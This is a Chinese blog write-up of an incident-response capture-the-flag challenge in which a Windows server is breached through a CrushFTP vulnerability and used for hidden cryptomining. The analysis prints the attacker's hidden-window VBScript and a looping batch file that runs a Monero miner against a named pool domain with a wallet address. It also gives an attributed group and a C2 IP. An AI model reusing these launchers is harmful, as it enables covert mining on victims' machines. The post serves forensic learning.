当前位置: 首页 > news >正文

Solar月赛(应急响应)——攻击者使用什么漏洞获取了服务器的配置文件?

某某文化有限公司的运维小王刚刚搭建服务器发现cpu莫名的异常的升高请你帮助小王排查一下服务器。

文章目录

    • 事件介绍
    • 事件1:帮助小王找到是什么漏洞?
    • 事件2:系统每天晚上系统都会卡卡的帮小明找到问题出在了那?
    • 事件3:恶意域名是什么?
    • 事件4:疑似是什么组织发动的攻击?
    • 事件5:攻击者C2服务器IP是什么?
    • 总结


事件介绍

起因:某某文化有限公司的运维小王刚刚搭建服务器发现cpu莫名的异常的升高请你帮助小王排查一下服务器。
帮助小王找到是什么漏洞导致了小王的运维生涯受到了打击?(回答攻击者利用的漏洞编号)

主机pass:Ngy@667788
flag格式为:flag{CVE-2020-12345}

相关资料下载:
链接: https://pan.baidu.com/s/1vAXXygEwdhXtLeoF8yA6KA?pwd=9d97 提取码: 9d97

解压密码:MWhEYGjaHkjk3UkE


事件1:帮助小王找到是什么漏洞?

首先我们打开下载的镜像文件放到虚拟机里运行,发现是一台Windows 10 Server的服务器:

在这里插入图片描述

根据题目的 ”帮助小王找到是什么漏洞?“ ,我们可以发现桌面有几个文件,打开看一下;

在浏览器里搜索两个文件的名字,可以发现这两个都是CVE漏洞:

在这里插入图片描述
在这里插入图片描述
输入flag后发现都不对,然后我也是问AI他们各自都有哪些CVE漏洞,最后也是找到了CrushFTP的一个CVE漏洞符合:
在这里插入图片描述

flag{CVE-2025-31161}

事件2:系统每天晚上系统都会卡卡的帮小明找到问题出在了那?

根据题目的 ”刚刚搭建服务器发现cpu莫名的异常的升高“ ,我们可以想到要么是开机启动项存在可疑任务,或者就是计划任务存在挖矿程序。

在这里插入图片描述

根据上述这些思路,我们可以进行相应的排查:

(1)计划任务检查

  • 首先在搜索框任务计划程序 查看有哪些可疑的进程正在运行;
  • 单击【开始】>【设置】>【控制面板】>【任务计划程序】;
  • 单击【开始】>【运行】,输入 “cmd”,然后在命令提示符窗口中输入 “schtasks.exe

在这里插入图片描述

(2)检查开机启动项:

  • 单击【开始】>【所有程序】>【启动】,默认情况下此目录为空;
  • 单击【开始】>【运行】,输入 “msconfig”,在弹出的窗口中切换到 “启动” 选项卡,查看是否存在命名异常的启动项目。若有,取消勾选该项目,并根据命令中显示的路径删除对应的文件。

在这里插入图片描述

(当然上述这些方法可能都太麻烦了,有没有更简单的办法。)

有的,这时候我们也可以使用工具帮助我们进行排查:

我个人一般使用 D盾Autoruns 来进行相应的检查

话不多说,直接执行这两个程序(标红的表示可能是恶意程序或者计划任务)

也是发现了部分异样:计划任务
在这里插入图片描述

资源管理器:
在这里插入图片描述

然后也是找到了恶意的计划任务sql

在这里插入图片描述
sql backing up就是导致每晚卡顿的原因

flag{sqlbackingup}

事件3:恶意域名是什么?

根据之前的发现,继续在这个文件夹里发掘看看还有什么收获。

在这里插入图片描述

set ws=createobject("wscript.shell")
ws.Run """sqlwscript.cmd""",0
  • set ws=createobject(“wscript.shell”)

    • createobject("wscript.shell"):创建一个 WScript.Shell 对象的实例。这个对象能让脚本与 Windows 操作系统进行交互,例如执行程序、创建快捷方式、读写注册表等。
    • set ws = ...:把创建好的 WScript.Shell 对象赋值给变量ws,方便后续使用。
  • ws.Run “”“sqlwscript.cmd”“”,0

    • ws.Run ...:调用 WScript.Shell 对象的Run方法来执行外部程序或脚本。
    • """sqlwscript.cmd""":要执行的命令。这里使用三重引号是为了正确处理路径中可能存在的空格。第一个和第三个引号是 VBScript 字符串的定界符,中间的两个引号会被解析为批处理文件路径里的一个引号。
    • ,0:Run方法的第二个参数,表示窗口样式。值为 0 时,意味着程序会在后台运行,也就是不会显示窗口。

接下来再查看sqlwscript这个脚本:

在这里插入图片描述

代码如下:

@echo off
cd /d "%~dp0"
:start
sqlwpr.exe -a rx/0 --url b.oracleservice.top --user 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ -t 0
goto start

从上面我们可以看到恶意的url了:

flag{b.oracleservice.top}

事件4:疑似是什么组织发动的攻击?

然后在文件夹发现一个应用程序sqlwpr,对刚才的代码进行分析:

  1. 基础设置:
    • @echo off:使命令执行过程不在控制台显示,保持界面干净。
    • cd /d "%~dp0":将工作目录切换到脚本所在目录,确保后续操作路径无误。
  2. 挖矿主循环:
    • :start和goto start构成无限循环,让挖矿程序持续运行。
    • sqlwpr.exe -a rx/0 --url b.oracleservice.top --user ... -t 0:调用挖矿程序进行加密货币挖掘。其中:
    • -a rx/0:采用 RandomX 算法,常用于门罗币(XMR)等加密货币的挖掘。
    • –url b.oracleservice.top:连接到指定的矿池服务器,该服务器域名显示与 Oracle 无关,是用于接收挖矿算力的远程地址。
    • --user ...:使用的矿工账户,是一个较长的字符串,用于标识挖矿收益的归属。
      - -t 0:设置线程数为 0,意味着程序会自动使用所有可用 CPU 核心,这会使 CPU 使用率大幅上升。

随后搜索恶意域名,发现具体的组织:
在这里插入图片描述
在这里插入图片描述

flag{8220Gang}

事件5:攻击者C2服务器IP是什么?

查看挖矿程序的上传时间,确定时间大概在2025.5.27 23:20:00左右

在这里插入图片描述

随后在Win + R 唤出cmd,然后输入eventvwr.msc 打开系统日志管理:

在这里插入图片描述
查询windows的安全日志,筛选 5156 事件(Windows 过滤平台放行连接),逐一查询这段时间之后powershell的出战痕迹

在这里插入图片描述

随后也是找到了相应的IP地址。具体如何筛选可以看这篇文章:Windows日志分析

当然,也可以直接导出筛选日志进行关键词搜索

将已筛选的日志导出为txt文件,然后直接搜索powershell.exe关键词,找出可疑的出站目的IP地址,即为C2服务器IP。

flag{156.238.230.57}

总结

没什么好说的,多学多练多复习。

http://www.lryc.cn/news/603903.html

相关文章:

  • 数据结构 排序(1)---插入排序
  • 广泛分布于内侧内嗅皮层全层的速度细胞(speed cells)对NLP中的深层语义分析的积极影响和启示
  • 自动化测试实战篇
  • win10更新异常,导致Microsoft Store 无法正常启用,无法正常安装exe应用程序。
  • 银行交易欺诈检测模型分析
  • 微服务 01
  • 【C++算法】76.优先级队列_前 K 个高频单词
  • 【车联网kafka】Kafka核心架构与实战经验(第一篇)
  • 13、select_points_object_model_3d解析
  • 【2025年7月29日】TrollStore巨魔商店恢复在线安装
  • 通缩漩涡中的测量突围:新启航如何以国产 3D 白光干涉仪劈开半导体成本困局?
  • 磁悬浮转子同频振动:自适应陷波器设计与稳定性深度解析(附MATLAB代码)
  • 开源数据库PostgreSQL专家技术
  • AI药师助手 + 药品图谱系统完整操作分析(python版)
  • 基于AI代码疫苗技术的开源软件供应链安全治理
  • 出现错误,Microsoft store初始化失败。请尝试刷新或稍后返回。
  • 多模态融合 + 动态记忆机制,突破模态壁垒,超火研究方向
  • Xilinx高性能低延时PCIe-DMA控制器IP,SGDMA,QDMA,RDMA,CDMA,V4L2驱动,视频采集、AD采集
  • C#基础篇 - 正则表达式入门
  • 在Word和WPS文字中让文字无极限缩放,用键盘更高效
  • C51 中断
  • Python批量生成N天前的多word个文件,并根据excel统计数据,修改word模板,合并多个word文件
  • 理解“无界队列”与“有界队列”及其适用场景
  • git使用lfs解决大文件上传限制
  • 2411.按位或最大的最小子数组长度
  • gTest测试框架的安装与配置
  • 三、Linux用户与权限管理详解
  • 【目标检测】小样本度量学习
  • 量子计算革命:重新定义计算的边界与未来
  • DNS污染与劫持